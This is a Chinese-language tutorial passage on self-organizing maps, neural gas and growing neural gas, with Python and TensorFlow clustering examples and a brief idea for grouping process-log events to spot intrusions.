catalogue
1. SOM簡介 2. SOM模型在應用中的設計細節 3. SOM功能分析 4. Self-Organizing Maps with TensorFlow 5. SOM在異常進程事件中自動分類的可行性設計 6. Neural gas簡介 7. Growing Neural Gas (GNG) Neural Network 8. Simple implementation of the "growing neural gas" artificial neural network 9. process event emberdding spalce Visualization
1. SOM簡介
1981年芬蘭Helsink大學的T.Kohonen教授提出一種自組織特征映射網,簡稱SOM網,又稱Kohonen網。Kohonen認為:一個神經網絡接受外界輸入模式時,將會分為不同的對應區域,各區域對輸入模式具有不同的響應特征,而且這個過程是自動完成的。自組織特征映射正是根據這一看法提出來的,其特點與人腦的自組織特性相類似
典型SOM網共有兩層,輸入層模擬感知外界輸入信息的視網膜,輸出層模擬做出響應的大腦皮層。下圖是1維和2維的兩個SOM網絡示意圖

0x1: SOM算法過程描述
一個SOM map是由很多神經元組成的,每個神經元由以下幾部分組成
1. 和輸入數據同維度的權重向量 2. 對應於二維空間(雖然沒有強制規定是二維,但是大多數情況下是二維)的一個(x,y)坐標點 3. 對應於該神經元的名字的name屬性
- Randomize the map's nodes' weight vectors:對競爭層(也是輸出層)各神經元權重賦小隨機數初值,並進行歸一化處理,歸一化處理有助於提高運算性能
- Grab an input vector
:獲取輸入向量,並對數據進行歸一化處理 - Traverse each node in the map:不斷提供新樣本、進行訓練
- Use the Euclidean distance formula to find the similarity between the input vector and the map's node's weight vector:根據歐式距離找到與輸入向量距離最小的權重向量,這一步本質上和K-means中尋找cluster中心點的思想是一樣的

- Track the node that produces the smallest distance (this node is the best matching unit, BMU):定義獲勝單元,這個神經元就是本次映射的獲勝單元
- Use the Euclidean distance formula to find the similarity between the input vector and the map's node's weight vector:根據歐式距離找到與輸入向量距離最小的權重向量,這一步本質上和K-means中尋找cluster中心點的思想是一樣的
- Update the nodes in the neighborhood(領域半徑隨訓練過程逐步減小) of the BMU (including the BMU itself) by pulling them closer to the input vector(在一次迭代的鄰域半徑中,距離winner神經元越遠,權值影響越小)
:獲勝單元的鄰近區域調整權重使其向輸入向量靠攏,臨近區域的大小由領域函數決定,調整的步伐大小由學習率決定 - Increase s and repeat from step 2 while
:每一輪得到獲勝者之后,收縮鄰域半徑(讓聚類過程可收斂)、減小學習率(防止過度聚合)、重復直到小於允許值(輪數到達上限,領域半徑或者學習率小於一個閾值) - 輸出聚類結果
is the current iteration
is the iteration limit
is the index of the target input data vector in the input data set 
is a target input data vector
is the index of the node in the map
is the current weight vector of node v
is the index of the best matching unit (BMU) in the map
is a restraint due to distance from BMU, usually called the neighborhood function, and
is a learning restraint due to iteration progress.
SOM是一種可以用於聚類的神經網絡模型,從深度上它是一個單層的神經網絡
這其他網絡使用SGD那種error-based feedback方式不同,SOM神經元采用競爭的方式(competitive learning)激活,每個神經元有一個權值向量
,輸入向量
會激活與之最接近的神經元,這個神經元叫做獲勝神經元(winner),獲勝者得到的好處是"winner task most",它可以讓周圍神經元向自己靠攏,從而使自己周圍出現更多和自己相似的神經元
而訓練的過程就是通過調整獲勝者自己以及周圍神經元的權重參數,在輸入訓練集的影響下,在每一輪中都"推選"出一個獲勝者,最終的結果是讓整個map的拓朴都是由一簇簇"獲勝者"互相靠近組成的網絡,看起來就像是對輸入數據的一種"仿照拓印"
0x2: SOM網的權值調整域
隨着時間(離散的訓練迭代次數)變長,學習率逐漸降低;隨着拓撲距離的增大,學習率降低
SOM網的獲勝神經元對其鄰近神經元的影響是由近及遠,由興奮逐漸轉變為抑制,因此其學習算法中不僅獲勝神經元本身要調整權向量,它周圍的神經元在其影響下也要程度不同地調整權向量。這種調整可用三種函數表示,下圖的bcd

Kohonen算法:基本思想是獲勝神經元對其鄰近神經元的影響是由近及遠,對附近神經元產生興奮影響逐漸變為抑制。在SOM中,不僅獲勝神經元要訓練調整權值,它周圍的神經元也要不同程度調整權向量。常見的調整方式有如下幾種
1. 墨西哥草帽函數:獲勝節點有最大的權值調整量,臨近的節點有稍小的調整量,離獲勝節點距離越大,權值調整量越小,直到某一距離0d時,權值調整量為零;當距離再遠一些時,權值調整量稍負,更遠又回到零。如(b)所示 2. 大禮帽函數:它是墨西哥草帽函數的一種簡化,如(c)所示 3. 廚師帽函數:它是大禮帽函數的一種簡化,如(d)所示
以獲勝神經元為中心設定一個鄰域半徑R,該半徑圈定的范圍稱為優勝鄰域。在SOM網學習算法中,優
勝鄰域內的所有神經元均按其離開獲勝神經元的距離遠近不同程度地調整權值。 優勝鄰域開始定得很大,但其大小隨着訓練次數的增加不斷收縮,最終收縮到半徑為零,從物理上模擬了自組織聚類的收斂過程
0x3: SOM map結構
所有的神經元組織成一個網格,網格可以是六邊形、四邊形……,甚至是鏈狀、圓圈……,投影后的網絡結構通常取決於輸入的數據在空間中的分布。
SOM的作用是將這個網格(由二維平面的神經元組成)鋪滿數據存在的空間。鋪滿的動態訓練過程如下:
1. 被激活的winner的權值會向輸入靠攏(擬合輸入訓練集),不斷動態調整 2. winner周圍的神經元會向winner靠攏(自組織的聚類過程)


其中,
是學習率,
是一個鄰域函數,兩個神經元在網格上離得越近,值就越大。
在鄰域函數的控制下,網格盡量保持着拓撲結構,同時被輸入數據拉扯着充滿輸入數據分布空間

最終的效果就是對數據進行了聚類,每個神經元代表一類。這一類所包含的數據,就是能夠使它競爭獲勝的那些數據。這種投影特性使得SOM非常適合做高維空間的低維(常常是二維)可視化
self-organizing map (SOM), also known as a Kohonen network, can be used to map high-dimensional data into a two-dimensional representation
SOM根據輸入的高維數據集在"結構相似性"上的共同點,映射到一個二維的坐標點集中,並在這個映射(降維)的過程中,保留原始數據集的拓朴結構,例如在高維空間中相鄰的數據點映射到SOM中之后依然是保持相鄰這個特性,當然在不同的空間維度,相鄰這個詞的含義可能不一樣,我們可以采用例如emberdding詞嵌入向量模型來定義輸入數據的相鄰性
0x4:SOM和K-means的異同
我在學習SOM的時候,多次感覺到SOM和K-means在核心思想上有很多的相似之處,但是也有區別
1. k-means我們可以理解為有一個很活躍的人,在一大群不同類別的人群中不斷穿梭,每次識別出同類后,就更新自己的中心點位置,不斷循環。但是SOM不同,它像是一個磁鐵,每次找到一個同類之后,向周圍一定范圍內的同類發出呼喚,讓它們朝自己自己靠近(距離越遠,呼喊的效果越差)。從直觀上看,我們會發現SOM比K-means的總體移動次數要多,這也意味着SOM的聚合拓印效果要好一些 2. 相同的一點也有,k-means里面的高維空間向量點向量相當於SOM(SOM由神經元組成)中神經元的權重向量,我覺得它們本質上是一樣的,所不同的是,SOM還具備基於神經元的權重向量,可以將高維空間的點向量投影到低維(二維)平面坐標點上,這讓SOM具備了降維的特性 3. 雖然具有少量節點的自組織映射行為類似於k-均值聚類算法,但較大(神經元節點較多)的自組織映射以一種本質上是拓撲性質的方式重新排列數據 4. 誠如我們知道,SOM是一種無監督學習,它僅僅根據輸入數據集尋找其中的拓朴模式,將其分類為一定數量的類別,但SOM最有趣的地方就在於其使用了神經元權重向量作為一個中間量,使得SOM這種無監督學習具備了"可模型化"的特性,換句話說,這種無監督學習得到的權重模型,並不是使用一次之后就丟棄,而是可以用於將來的分類/預測中 5. SOM模型的無監督聚類的好壞,一定程度上取決於訓練樣本本身(內部是否包含足夠豐富的模式) 6. 但是要注意的是,SOM和真正的有監督學習(例如CNN)得到的模型權重向量組還不完全一樣,SOM的模型對輸入訓練集更敏感,它完全是基於訓練集中的拓朴結構得到的一種擬合結果,SOM本身無法保證泛化能力,泛化能力的重任需要交給訓練樣本集的獲取階段,也即我們需要近可能地搜集到類型廣泛的訓練樣本集,使樣本集中包含的模式足夠豐富 7. K-Means需要事先定下類的個數,也就是K的值。 SOM則不用,隱藏層中的某些節點可以沒有任何輸入數據屬於它。所以,K-Means受初始化的影響要比較大。 8. K-means為每個輸入數據找到一個最相似的類后,只更新這個類的參數。SOM則會更新臨近的節點。所以K-mean受noise data的影響比較大,SOM的准確性可能會比k-means低(因為也更新了臨近節點) 9. SOM的可視化比較好。優雅的拓撲關系圖
0x5: SOM Trainning && Classification
1. training: 我們根據訓練樣本訓練得到的SOM權重向量組相當於DNN中訓練得到一個權重參數 2. mapping: "mapping" automatically classifies a new input vector. 根據訓練得到的權重參數,對新的輸入數據進行分類(classifaction),無監督得到的權重相當於有監督學習得到的分類模型可以用於predict
0x6: 概念示例代碼
有8個輸入樣本,每個輸入樣本由兩個特征值組成(x,y),表示在二維坐標系(橫為x,縱為y)上如下圖所示

要求使用som算法將上圖中的輸入節點划分為兩類,即得到兩個神經元,神經元的權重可以直觀上理解為輸入數據同維度的向量
1. 輸入樣本的特征為2(分別是x與y坐標值),共有8個輸入樣本,所以輸入層的節點數為8 2. 因為最終要划分為兩類,所以需要定義兩個輸出樣本,所以輸出節點為2,且兩個輸出節點的特征數為2(x,y)。 3. 根據以上規則隨機初始化兩個輸出節點W。 4. for 每一個輸入節點 INPUT{ for 每一個輸出節點W{ 計算當前輸入節點i與輸出節點w之間的歐式距離; } 找到離當前輸入節點i最近(歐式距離最小)的那個輸出節點w作為獲勝節點; 調整w的特征值,使該w的特征值趨近於當前的輸入節點(有個閾值(步長)控制幅度); } 衰減閾值(步長); 5. 循環執行步數<4>,直到輸出節點W趨於穩定(閾值(步長)很小)
code
# -*- coding:utf-8 -*- # som 實例算法 by 自由爸爸 import random import math input_layer = [[39, 281], [18, 307], [24, 242], [54, 333], [322, 35], [352, 17], [278, 22], [382, 48]] # 輸入節點 category = 2 class Som_simple_zybb(): def __init__(self, category): self.input_layer = input_layer # 輸入樣本 self.output_layer = [] # 輸出數據 self.step_alpha = 0.5 # 步長 初始化為0.5 self.step_alpha_del_rate = 0.95 # 步長衰變率 self.category = category # 類別個數 self.output_layer_length = len(self.input_layer[0]) # 輸出節點個數 2 self.d = [0.0] * self.category # 初始化 output_layer def initial_output_layer(self): for i in range(self.category): self.output_layer.append([]) for _ in range(self.output_layer_length): self.output_layer[i].append(random.randint(0, 400)) # som 算法的主要邏輯 # 計算某個輸入樣本 與 所有的輸出節點之間的距離,存儲於 self.d 之中 def calc_distance(self, a_input): self.d = [0.0] * self.category for i in range(self.category): w = self.output_layer[i] # self.d[i] = for j in range(len(a_input)): self.d[i] += math.pow((a_input[j] - w[j]), 2) # 就不開根號了 # 計算一個列表中的最小值 ,並將最小值的索引返回 def get_min(self, a_list): min_index = a_list.index(min(a_list)) return min_index # 將輸出節點朝着當前的節點逼近(對node節點的所有維度,這里是x,y分別都進行更新) def move(self, a_input, min_output_index): for i in range(len(self.output_layer[min_output_index])): # 這里不考慮距離winner神經元越遠,更新率的衰減問題 self.output_layer[min_output_index][i] = self.output_layer[min_output_index][i] + self.step_alpha * (a_input[i] - self.output_layer[min_output_index][i]) # som 邏輯 (一次循環) def train(self): for a_input in self.input_layer: self.calc_distance(a_input) min_output_index = self.get_min(self.d) self.move(a_input, min_output_index) # 循環執行som_train 直到穩定 def som_looper(self): generate = 0 while self.step_alpha >= 0.0001: # 這樣子會執行167代 self.train() generate += 1 print("代數:{0} 此時步長:{1} 輸出節點:{2}".format(generate, self.step_alpha, self.output_layer)) self.step_alpha *= self.step_alpha_del_rate # 步長衰減 if __name__ == '__main__': som_zybb = Som_simple_zybb(category) som_zybb.initial_output_layer() som_zybb.som_looper()

Relevant Link:
http://www.pymvpa.org/installation.html http://www.pymvpa.org/examples/som.html https://www.zhihu.com/question/28046923 http://blog.csdn.net/xuesen_lin/article/details/6020602 http://blog.csdn.net/xbinworld/article/details/50826892 https://en.wikipedia.org/wiki/Self-organizing_map http://www.ziyoubaba.com/archives/606#comment-148 http://www.cnblogs.com/sylvanas2012/p/5117056.html http://blog.sciencenet.cn/blog-468005-883687.html http://blog.csdn.net/wangxin110000/article/details/22150557
2. SOM模型在應用中的設計細節
0x1: 輸出層設計
輸出層神經元數量設定和訓練集樣本的類別數相關,但是實際中我們往往不能清除地知道有多少類。如果神經元節點數少於類別數,則不足以區分全部模式,訓練的結果勢必將相近的模式類合並為一類;相反,如果神經元節點數多於類別數,則有可能分的過細,或者是出現“死節點”,即在訓練過程中,某個節點從未獲勝過且遠離其他獲勝節點,因此它們的權值從未得到過更新。
不過一般來說,如果對類別數沒有確定知識,寧可先設定較多的節點數,以便較好的映射樣本的拓撲結構,如果分類過細再酌情減少輸出節點。“死節點”問題一般可通過重新初始化權值得到解決
0x2: 輸出層節點排列的設計
輸出層的節點排列成哪種形式取決於實際應用的需要,排列形式應盡量直觀反映出實際問題的物理意義。例如,對於旅行路徑類的問題,二維平面比較直觀;對於一般的分類問題,一個輸出節點節能代表一個模式類,用一維線陣意義明確結構簡單
0x3: 權值初始化問題
基本原則是盡量使權值的初始位置與輸入樣本的大概分布區域充分重合,不要出現大量的初始“死節點”,這和K-means的權值初始化的要求是一樣的
1. 一種簡單易行的方法是從訓練集中隨機抽取m(神經元數目)個輸入樣本作為初始權值,即初始化的權重直接對應了m個輸入點 2. 另一種可行的辦法是先計算出全體樣本的中心向量,在該中心向量基礎上迭加小隨機數作為權向量初始值,也可將權向量的初始位置確定在樣本群中(找離中心近的點)
這兩種初始化方法都體現了一種"盡可能去擬合"的思想
0x4: 優勝鄰域的設計
優勝領域設計原則是使鄰域不斷縮小,這樣輸出平面上相鄰神經元對應的權向量之間既有區別又有相當的相似性,從而保證當獲勝節點對某一類模式產生最大響應時,其鄰域節點也能產生較大響應(物以類聚)。鄰域的形狀可以是正方形、六邊形或者菱形。優勢領域的大小用領域的半徑表示,r(t)的設計目前沒有一般化的數學方法,通常憑借經驗來選擇。下面是兩種典型形式

C1為於輸出層節點數有關的正常數, B1為大於1的常數,T為預先選定的最大訓練次數,上面2個形式總體上都是一個逐漸收斂的曲線
0x5: 學習率的設計
在訓練開始時,學習率可以選取較大的值,之后以較快的速度下降,這樣有利於很快捕捉到輸入向量的拓朴結構,然后學習率在較小的值上緩降至0值,這樣可以精細地調整權值使之符合輸入空間的樣本分布結構
Relevant Link:
http://blog.csdn.net/xbinworld/article/details/50890900
3. SOM功能分析
1. 保序映射: 將輸入空間的樣本模式類有序地映射在輸出層上 2. 數據壓縮: 將高維空間的樣本在保持拓撲結構不變的條件下投影到低維的空間,在這方面SOM網具有明顯的優勢。無論輸入樣本空間是多少維,其模式都可以在SOM網輸出層的某個區域得到相應。SOM網經過訓練以后,在高維空間輸入相近的樣本,其輸出相應的位置也相近 3. 特征提取: 從高維空間樣本向低維空間的映射,SOM網的輸出層相當於低維特征空間
對於SOM的輸入訓練數據集,根據是否具備label,可以讓SOM在一定程度上具備有監督學習的一些特性,我們對這兩種情況分開討論
0x1: 無label的訓練集
對這種訓練數據集來說,每一個樣本的label我們事先都是不知道的,我們能做的只是設定好som的神經元數量,然后讓som自動聚類出指定數量的類別,可能有些神經元成為死節點(即沒有任何輸入樣本映射到它),分類得到的神經元只有index序號而沒有更多的label信息,對分類后的樣本集的label工作需要人工介入完成
0x2: 有label的訓練集
這部分是我覺得最神奇的部分,它讓我感覺到有監督學習和無監督學習之間的鴻溝並沒有100%的存在,有監督還是無監督並不一定取決於模型,有時候還取決於樣本以及使用樣本的方法。大致的流程是這樣的
1. 對於一份有label的訓練集,我們按照8:2的方式進行across_validation 2. 按照和無label方式進行SOM聚類 3. 在每完成一次epoch之后,將winner神經元節點中對對應輸入樣本的label的match命中數+1,注意:訓練集中不同的input數據向量,可能映射到同一個node神經元中,這時候,對這個node神經元就會tag上不同的label,對這種情況,我們要采取"投票"的方法,取label命中次數多者,這可能會帶來誤報,但也無法避免,這和K-means聚類中遇到一個點和多個中心的距離都相等的情況類似(即那種屬於灰色地帶的點該歸類到哪一類的問題) 4. 在完成對所有輸入樣本的訓練后,對得到的映射神經元node的label list進行投票計算(因為有可能一個神經元node有多個label),選出得到最多的label作為最終label。這一步可以理解為在無監督的分類結果上利用label進行了一次有監督的封裝,使得該算法具備了有監督的特性 5. 在驗證test數據集的時候,利用SOM模型的predict特性得到模型預測的label,將結果和test集中的label進行對比,從而得到准確率的評估 6. 在之后的predict中,這個模型就具備了對輸入數據直接輸出label的能力,但是泛化能力較差,只能識別出已知(或者和已知相似)label的數據集,對未知的也無法實現label的效果
4. Self-Organizing Maps with TensorFlow
我們基於tensorflow對一個三維空間的RGB點集進行SOM自組織聚類,通過訓練"學習"到RGB三維空間的拓朴結構,得到一組權重向量模型,這組權重向量模型可以用於后續地對新的RGB三維空間點的類別預測

# -*- coding: utf-8 -*- import tensorflow as tf import numpy as np class SOM(object): """ 2-D Self-Organizing Map with Gaussian Neighbourhood function and linearly decreasing learning rate. """ # To check if the SOM has been trained _trained = False def __init__(self, m, n, dim, n_iterations=100, alpha=None, sigma=None): """ Initializes all necessary components of the TensorFlow Graph. 1. m X n are the dimensions of the SOM. 2. 'n_iterations' should be an integer denoting the number of iterations undergone while training. 3. 'dim' is the dimensionality of the training inputs. 4. 'alpha' is a number denoting the initial time(iteration no)-based learning rate. Default value is 0.3 5. 'sigma' is the the initial neighbourhood value, denoting the radius of influence of the BMU while training. By default, its taken to be half of max(m, n). """ # Assign required variables first self._m = m self._n = n if alpha is None: alpha = 0.3 else: alpha = float(alpha) if sigma is None: sigma = max(m, n) / 2.0 else: sigma = float(sigma) self._n_iterations = abs(int(n_iterations)) ##INITIALIZE GRAPH # A TensorFlow computation, represented as a dataflow graph. self._graph = tf.Graph() ##POPULATE GRAPH WITH NECESSARY COMPONENTS # overrides the current default graph for the lifetime of the context: with self._graph.as_default(): ##VARIABLES AND CONSTANT OPS FOR DATA STORAGE # Randomly initialized weightage vectors for all neurons, stored together as a matrix Variable of size [m*n, dim] # 神經元的數量是初始化時預定的,這代表了我們想把輸入數據聚類為多少類,而維度是和輸入數據等維度的 self._weightage_vects = tf.Variable(tf.random_normal([m * n, dim])) # Matrix of size [m*n, 2] for SOM grid locations of neurons # SOM神經元的個數,,是一個二維的m*n空間 self._location_vects = tf.constant(np.array(list(self._neuron_locations(m, n)))) ##PLACEHOLDERS FOR TRAINING INPUTS # We need to assign them as attributes to self, since they will be fed in during training # The training vector self._vect_input = tf.placeholder("float", [dim]) # Iteration number self._iter_input = tf.placeholder("float") ##CONSTRUCT TRAINING OP PIECE BY PIECE # Only the final, 'root' training op needs to be assigned as an attribute to self, since all the rest will be executed automatically during training # To compute the Best Matching Unit given a vector Basically calculates the Euclidean distance between every neuron's weightage vector and the input, # and returns the index of the neuron which gives the least value bmu_index = tf.argmin(tf.sqrt(tf.reduce_sum( tf.pow(tf.subtract(self._weightage_vects, tf.stack( [self._vect_input for i in range(m * n)])), 2), 1)), 0) # This will extract the location of the BMU based on the BMU's index slice_input = tf.pad(tf.reshape(bmu_index, [1]), np.array([[0, 1]])) bmu_loc = tf.reshape(tf.slice(self._location_vects, slice_input, tf.constant(np.array([1, 2]))), [2]) # To compute the alpha and sigma values based on iteration number learning_rate_op = tf.subtract(1.0, tf.div(self._iter_input, self._n_iterations)) _alpha_op = tf.multiply(alpha, learning_rate_op) _sigma_op = tf.multiply(sigma, learning_rate_op) # Construct the op that will generate a vector with learning rates for all neurons, based on iteration number and location wrt BMU. bmu_distance_squares = tf.reduce_sum(tf.pow(tf.subtract( self._location_vects, tf.stack( [bmu_loc for i in range(m * n)])), 2), 1) neighbourhood_func = tf.exp(tf.negative(tf.div(tf.cast( bmu_distance_squares, "float32"), tf.pow(_sigma_op, 2)))) # 優勝鄰域隨離BMU越遠,影響范圍呈e指數逐漸收斂 learning_rate_op = tf.multiply(_alpha_op, neighbourhood_func) # Finally, the op that will use learning_rate_op to update the weightage vectors of all neurons based on a particular input # 包括BMU及其周邊的神經元節點,更新權值(即向BMU靠攏) learning_rate_multiplier = tf.stack([tf.tile(tf.slice( learning_rate_op, np.array([i]), np.array([1])), [dim]) for i in range(m * n)]) weightage_delta = tf.multiply( learning_rate_multiplier, tf.subtract(tf.stack([self._vect_input for i in range(m * n)]), self._weightage_vects)) new_weightages_op = tf.add(self._weightage_vects, weightage_delta) self._training_op = tf.assign(self._weightage_vects, new_weightages_op) ##INITIALIZE SESSION self._sess = tf.Session() ##INITIALIZE VARIABLES init_op = tf.global_variables_initializer() self._sess.run(init_op) def _neuron_locations(self, m, n): """ Yields one by one the 2-D locations of the individual neurons in the SOM. """ # Nested iterations over both dimensions # to generate all 2-D locations in the map for i in range(m): for j in range(n): yield np.array([i, j]) def train(self, input_vects): """ Trains the SOM. 'input_vects' should be an iterable of 1-D NumPy arrays with dimensionality as provided during initialization of this SOM. Current weightage vectors for all neurons(initially random) are taken as starting conditions for training. """ # Training iterations for iter_no in range(self._n_iterations): # Train with each vector one by one for input_vect in input_vects: self._sess.run(self._training_op, feed_dict={self._vect_input: input_vect, self._iter_input: iter_no}) # Store a centroid grid for easy retrieval later on centroid_grid = [[] for i in range(self._m)] self._weightages = list(self._sess.run(self._weightage_vects)) self._locations = list(self._sess.run(self._location_vects)) for i, loc in enumerate(self._locations): centroid_grid[loc[0]].append(self._weightages[i]) self._centroid_grid = centroid_grid self._trained = True def get_centroids(self): """ Returns a list of 'm' lists, with each inner list containing the 'n' corresponding centroid locations as 1-D NumPy arrays. """ if not self._trained: raise ValueError("SOM not trained yet") return self._centroid_grid def map_vects(self, input_vects): """ Maps each input vector to the relevant neuron in the SOM grid. 'input_vects' should be an iterable of 1-D NumPy arrays with dimensionality as provided during initialization of this SOM. Returns a list of 1-D NumPy arrays containing (row, column) info for each input vector(in the same order), corresponding to mapped neuron. """ if not self._trained: raise ValueError("SOM not trained yet") to_return = [] for vect in input_vects: min_index = min([i for i in range(len(self._weightages))], key=lambda x: np.linalg.norm(vect - self._weightages[x])) to_return.append(self._locations[min_index]) return to_return # For plotting the images from matplotlib import pyplot as plt if __name__ == '__main__': # Training inputs for RGBcolors colors = np.array( [[0., 0., 0.], [0., 0., 1.], [0., 0., 0.5], [0.125, 0.529, 1.0], [0.33, 0.4, 0.67], [0.6, 0.5, 1.0], [0., 1., 0.], [1., 0., 0.], [0., 1., 1.], [1., 0., 1.], [1., 1., 0.], [1., 1., 1.], [.33, .33, .33], [.5, .5, .5], [.66, .66, .66]]) # classify a labeled trainning set color_names = \ ['black', 'blue', 'darkblue', 'skyblue', 'greyblue', 'lilac', 'green', 'red', 'cyan', 'violet', 'yellow', 'white', 'darkgrey', 'mediumgrey', 'lightgrey'] # Train a 20x30 SOM with 400 iterations, input data set is 3 dim som = SOM(m=20, n=30, dim=3, n_iterations=400) som.train(colors) # Get output grid # 訓練結束后,得到的som神經元節點的二維坐標點以及對應的權重向量會被保存下來 image_grid = som.get_centroids() # Map colours to their closest neurons # 將輸入input數據和神經元通過"input和權重的拓朴匹配度"關聯起來,為了后續對som聚類得到的分類進行label而准備 mapped = som.map_vects(colors) # Plot plt.imshow(image_grid) plt.title('Color SOM') for i, m in enumerate(mapped): # color_names[i]: 該input的label # m: 對應神經元的二維坐標 plt.text(m[1], m[0], color_names[i], ha='center', va='center', bbox=dict(facecolor='white', alpha=0.5, lw=0)) plt.show()

tensorflow對lebel的訓練集進行了自組織的聚類,同樣本次訓練建立的模型可以通過pikel保存到磁盤上,share給其他人使用
Relevant Link:
http://iamthevastidledhitchhiker.github.io/2016-03-11-TF_SOM https://codesachin.wordpress.com/2015/11/28/self-organizing-maps-with-googles-tensorflow/ https://codesachin.wordpress.com/2015/11/28/self-organizing-maps-with-googles-tensorflow/ https://pypi.python.org/pypi/kohonen https://media.readthedocs.org/pdf/kohonen/latest/kohonen.pdf
5. SOM在異常進程事件中自動分類的可行性設計
抽取一批系統進程全量日志
將其映射到emberding詞向量空間中,每個事件padding/cutting到200byte長度,得到一組高維空間向量數據集
通過SOM得到一個聚類投影權值模型,用100個神經元,直接投影到1維,因為我們的目的僅僅是為了分類,並沒有空間上的物理需求
然后根據得到的模型對全量日志進行classification,給每類一個tag
人工介入分析每一類進程事件,探查是否存在惡意入侵跡象
Relevant Link:
https://github.com/pybrain/pybrain
6. Neural gas簡介
Neural gas is an artificial neural network, inspired by the self-organizing map and introduced in 1991 by Thomas Martinetz and Klaus Schulten The neural gas is a simple algorithm for finding optimal data representations based on feature vectors. The algorithm was coined "neural gas" because of the dynamics of the feature vectors during the adaptation process, which distribute themselves like a gas within the data space.
It is applied where data compression or vector quantization is an issue, for example
1. speech recognition 2. image processing 3. pattern recognition. 4. As a robustly converging alternative to the k-means clustering it is also used for cluster analysis.
0x1: Algorithm
Given a probability distribution P(x) of data vectors x and a finite number of feature vectors wi, i=1,...,N.
With each time step t a data vector randomly chosen from P is presented. Subsequently, the distance order of the feature vectors to the given data vector x is determined. i0 denotes the index of the closest feature vector, i1 the index of the second closest feature vector etc. and iN-1 the index of the feature vector most distant to x. Then each feature vector (k=0,...,N-1) is adapted according to
with ε as the adaptation step size(類似learning rate學習率) and λ as the so-called neighborhood range(鄰域窗口函數). ε and λ are reduced with increasing t(權值調整參數隨時間衰減). After sufficiently many adaptation steps the feature vectors cover the data space with minimum representation error.
The adaptation step of the neural gas can be interpreted as gradient descent on a cost function. By adapting not only the closest feature vector but all of them with a step size decreasing with increasing distance order(不僅更新和輸入向量最接近的神經元權重,還根據距離衰減算法對周圍范圍的神經元權重也施加遞減的影響), compared to (online) k-means clustering a much more robust convergence of the algorithm can be achieved. The neural gas model does not delete a node and also does not create new nodes.
從本質上理解:
這是一種局部參數權重更新算法,更一般地說,無監督學習都傾向於進行局部特征學習,因為無監督學習在訓練前並不知道全局的情況,它只能采取局部最優原則由近及遠地去學習數據中的拓朴模式。而有監督學習則正好相反,它在一開始就知道了數據的全局概覽,所以每走一步都要縱觀整個數據集的整個情況,時刻將模型的權重向着整體最優的目標去靠攏
因為這點的區別,無監督學習更像是一種拓朴學習,而有監督學習像是一種整體策略學習
Relevant Link:
https://en.wikipedia.org/wiki/Neural_gas
7. Growing Neural Gas (GNG) Neural Network
The Growing Neural Gas (GNG) Neural Network belongs to the class of Topology Representing Networks (TRN's). It can learn supervised and unsupervised.
0x1: Hebbian theory
赫布理論神經科學,提出了大腦中的神經元自適應解釋在學習過程中,對突觸可塑性的基本機制,在突觸效能的增加產生突觸前細胞的重復和突觸后細胞的持續刺激,Hebbian理論認為如果在訓練過程中,神經元A持續對神經元B刺激,當這種刺激到達足夠強度后,會促使AB神經元都發生變化,突觸會得到相對永久的強化(growing)
The theory attempts to explain associative or Hebbian learning, in which simultaneous activation of cells leads to pronounced increases in synaptic strength between those cells, and provides a biological basis for errorless learning methods for education and memory rehabilitation. In the study of neural networks in cognitive function, it is often regarded as the neuronal basis of unsupervised learning.
The general idea is an old one, that any two cells or systems of cells that are repeatedly active at the same time will tend to become 'associated', so that activity in one facilitates activity in the other.
即神經元的激活是雙向的,這種雙向性通過"相互聯系"這種關系得到體現
From the point of view of artificial neurons and artificial neural networks, Hebb's principle can be described as a method of determining how to alter the weights between model neurons. The weight between two neurons increases if the two neurons activate simultaneously, and reduces if they activate separately. Nodes that tend to be either both positive or both negative at the same time have strong positive weights, while those that tend to be opposite have strong negative weights.
The following is a formulaic description of Hebbian learning: (note that many other descriptions are possible)
where
is the weight of the connection from neuron
to neuron
and
the input for neuron
. Note that this is pattern learning (weights updated after every training example). With binary neurons (activations either 0 or 1), connections would be set to 1 if the connected neurons have the same activation for a pattern.
Another formulaic description is:
where
is the weight of the connection from neuron
to neuron
,
is the number of training patterns, and
the
th input for neuron
. This is learning by epoch (weights updated after all the training examples are presented).
Hebb's Rule is often generalized as
or the change in the
th synaptic weight
is equal to a learning rate
times the
th input
times the postsynaptic response
. Often cited is the case of a linear neuron,
0x2: 生長型神經氣背景
上世紀 90 年代,人工神經網絡研究人員得出了一個結論: 有必要為那些缺少網絡層固定拓撲特征的運算機制,開發一個新的類。也就是說,人工神經在特征空間內的數量和布置並不會事先指定,而是在學習此類模型的過程中、根據輸入數據的特性來計算,獨立調節也與其適應。我們注意到,CNN/RNN這種在訓練開始前就預先設置好了網絡的神經元拓朴結構而訓練的過程只是在調整這些神經元的參數,對於無監督學習的場景來說,大多數情況下,我們是無法預先知道輸入數據空間的拓朴分布的
之所以有這種想法,就是因為出現了大量輸入參數的壓縮和向量量化受阻的實際問題,比如語音與圖像識別、抽象范式的分類與識別等。包括我們本文着重討論的場景,異常進程事件里的輸入數據,往往其長度都是不一致的,如果要進入深度神經網絡DNN/CNN訓練,是必須要進行裁剪壓縮等處理,這可能會丟失一部分的輸入數據的拓朴結構
因為當時 自組織映射與 赫布型學習已為人所知(尤其是生成網絡拓撲 - 即在神經元之間創建一系列連接,構成一個"框架"層 - 的算法),而且 "軟" 競爭學習的方法亦已算出(在此類流程中,權重不僅適應"贏家"神經元,還適用其"近鄰"神經元,本次競爭失敗的神經元也要調整一下自己的參數,爭取下次成功),合理的步驟是將上述方法結合起來,而這已由德國科學家 Bernd Fritzke 於 1995 年完成,從而創建了如今的流行算法 "生長型神經氣"(GNG)
此方法被證實非常成功,所以出現了一系列由其衍生的修改版本;其中之一就是監督式學習的改編適應版本 (Supervised-GNG)。據作者稱:與徑向基函數網絡相比,S-GNG 因其在難以分類的輸入空間領域中的優化拓撲能力,而顯示出強大得多的數據分類效率。勿庸置疑,GNG 要優於 "K-means" 聚類
0x3: 算法簡述
GNG 是一種允許實施輸入數據自適應 聚類的算法,也就是說,不僅將空間划分為群集,還會基於數據的特性確定其所需數量
該算法只以兩個神經元開始,不斷變化它們的數量(多數情況下是增長),同時,利用競爭赫布型學習法,在神經元之間創建一系列最佳對應輸入向量分布的連接。每個神經元都有一個累積所謂“局部誤差”的內部變量。節點之間的連接則以一個名為 "age" (年齡)的變量為特征
- 初始化:創建兩個帶權重向量(輸入向量的分布允許范圍內的維度)的節點,以及局部誤差(用於保存該神經元和輸入向量的誤差)的零值;將其年齡設為 0 以連接這2個節點
- 數據訓練:向神經網絡
輸入一個input訓練向量 - 尋找和輸入訓練樣本向量最接近的2個神經元:在最接近
的地方找到
和
兩個神經元,即帶有權重向量
與
